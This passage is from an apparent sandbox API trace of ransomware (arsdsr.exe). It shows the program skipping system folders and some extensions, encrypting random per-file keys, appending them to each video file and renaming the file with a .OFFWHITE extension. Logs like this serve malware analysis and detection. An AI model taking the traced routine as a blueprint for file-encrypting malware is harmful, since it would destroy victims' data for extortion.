pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.410] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.410] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.410] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.417] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf1e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.417] SetLastError (dwErrCode=0x0) [0136.417] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.506] GetLastError () returned 0x0 [0139.506] GetLastError () returned 0x0 [0139.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf2e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.506] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.507] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf3e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.507] WriteFile (in: hFile=0x21c, lpBuffer=0x522110*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522110*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0139.507] GetProcessHeap () returned 0x500000 [0139.507] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xf1e7) returned 0x55a7b8 [0139.507] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.507] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xf1e7, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xf1e7, lpOverlapped=0x0) returned 1 [0139.511] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.511] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xf1e7, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xf1e7, lpOverlapped=0x0) returned 1 [0139.512] GetProcessHeap () returned 0x500000 [0139.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0139.512] CloseHandle (hObject=0x21c) returned 1 [0139.513] GetProcessHeap () returned 0x500000 [0139.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0139.514] GetProcessHeap () returned 0x500000 [0139.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0139.514] GetProcessHeap () returned 0x500000 [0139.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0139.514] GetProcessHeap () returned 0x500000 [0139.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0139.514] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv" [0139.514] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv.OFFWHITE" [0139.514] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\wyaejjiwlrd0.mkv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\WYaejJiwLrd0.mkv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\wyaejjiwlrd0.mkv.offwhite")) returned 1 [0139.515] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa30ce080, ftCreationTime.dwHighDateTime=0x1d5e20d, ftLastAccessTime.dwLowDateTime=0xcea8a6b0, ftLastAccessTime.dwHighDateTime=0x1d5e36c, ftLastWriteTime.dwLowDateTime=0xcea8a6b0, ftLastWriteTime.dwHighDateTime=0x1d5e36c, nFileSizeHigh=0x0, nFileSizeLow=0xc661, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="yG3kqDuYJMcrHbcT0.avi", cAlternateFileName="YG3KQD~1.AVI")) returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2=".") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="..") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="...") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="windows") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="$recycle.bin") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="rsa") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="ntuser.dat") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="programdata") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="appdata") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="program files") returned 1 [0139.515] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="program files (x86)") returned 1 [0139.515] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0139.515] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="yG3kqDuYJMcrHbcT0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi" [0139.515] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.515] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.515] PathFindExtensionW (pszPath="yG3kqDuYJMcrHbcT0.avi") returned=".avi" [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0139.516] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0139.516] lstrcmpiW (lpString1="yG3kqDuYJMcrHbcT0.avi", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0139.516] GetProcessHeap () returned 0x500000 [0139.516] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522120 [0139.516] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\yg3kqduyjmcrhbct0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0139.517] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=50785) returned 1 [0139.517] GetProcessHeap () returned 0x500000 [0139.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0139.517] GetProcessHeap () returned 0x500000 [0139.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0139.517] GetProcessHeap () returned 0x500000 [0139.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0139.517] GetProcessHeap () returned 0x500000 [0139.517] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0139.517] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.517] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.517] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0139.517] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.517] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.517] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0139.517] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.517] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.517] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0139.518] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.518] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.518] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0139.518] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc661, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.518] SetLastError (dwErrCode=0x0) [0139.518] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.520] GetLastError () returned 0x0 [0139.520] GetLastError () returned 0x0 [0139.520] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc761, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.520] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.520] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc861, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.520] WriteFile (in: hFile=0x21c, lpBuffer=0x522120*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522120*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0139.521] GetProcessHeap () returned 0x500000 [0139.521] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc661) returned 0x55a7b8 [0139.521] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.521] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xc661, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xc661, lpOverlapped=0x0) returned 1 [0139.524] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.524] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xc661, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xc661, lpOverlapped=0x0) returned 1 [0139.525] GetProcessHeap () returned 0x500000 [0139.525] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0139.525] CloseHandle (hObject=0x21c) returned 1 [0139.526] GetProcessHeap () returned 0x500000 [0139.526] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0139.526] GetProcessHeap () returned 0x500000 [0139.526] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0139.526] GetProcessHeap () returned 0x500000 [0139.526] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0139.526] GetProcessHeap () returned 0x500000 [0139.526] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0139.526] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi" [0139.526] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi.OFFWHITE" [0139.526] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\yg3kqduyjmcrhbct0.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\yG3kqDuYJMcrHbcT0.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\yg3kqduyjmcrhbct0.avi.offwhite")) returned 1 [0139.527] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc66a7d70, ftCreationTime.dwHighDateTime=0x1d5de08, ftLastAccessTime.dwLowDateTime=0x9172d570, ftLastAccessTime.dwHighDateTime=0x1d5e64d, ftLastWriteTime.dwLowDateTime=0x9172d570, ftLastWriteTime.dwHighDateTime=0x1d5e64d, nFileSizeHigh=0x0, nFileSizeLow=0xd825, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="_H 3n440vw-zqF0.avi", cAlternateFileName="_H3N44~1.AVI")) returned 1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2=".") returned 1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="..") returned 1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="...") returned 1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="windows") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="$recycle.bin") returned 1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="rsa") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="ntuser.dat") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="programdata") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="appdata") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="program files") returned -1 [0139.527] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="program files (x86)") returned -1 [0139.527] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0139.527] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="_H 3n440vw-zqF0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi" [0139.528] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.528] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.528] PathFindExtensionW (pszPath="_H 3n440vw-zqF0.avi") returned=".avi" [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0139.528] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0139.528] lstrcmpiW (lpString1="_H 3n440vw-zqF0.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0139.528] GetProcessHeap () returned 0x500000 [0139.528] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522130 [0139.528] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\_h 3n440vw-zqf0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0139.529] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=55333) returned 1 [0139.529] GetProcessHeap () returned 0x500000 [0139.529] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0139.529] GetProcessHeap () returned 0x500000 [0139.529] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0139.529] GetProcessHeap () returned 0x500000 [0139.529] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0139.529] GetProcessHeap () returned 0x500000 [0139.529] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0139.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.529] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0139.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.529] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0139.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.529] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0139.529] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0139.529] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0139.529] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0139.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd825, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.530] SetLastError (dwErrCode=0x0) [0139.530] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.554] GetLastError () returned 0x0 [0139.554] GetLastError () returned 0x0 [0139.554] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xd925, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.554] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0139.554] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xda25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.555] WriteFile (in: hFile=0x21c, lpBuffer=0x522130*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522130*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0139.555] GetProcessHeap () returned 0x500000 [0139.555] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd825) returned 0x55a7b8 [0139.555] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.555] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xd825, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0xd825, lpOverlapped=0x0) returned 1 [0139.559] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.559] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xd825, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0xd825, lpOverlapped=0x0) returned 1 [0139.559] GetProcessHeap () returned 0x500000 [0139.559] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0139.559] CloseHandle (hObject=0x21c) returned 1 [0139.561] GetProcessHeap () returned 0x500000 [0139.561] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0139.561] GetProcessHeap () returned 0x500000 [0139.561] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0139.561] GetProcessHeap () returned 0x500000 [0139.561] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0139.561] GetProcessHeap () returned 0x500000 [0139.561] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0139.561] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi" [0139.561] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 3n440vw-zqF0.avi.OFFWHITE" [0139.561] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\_H 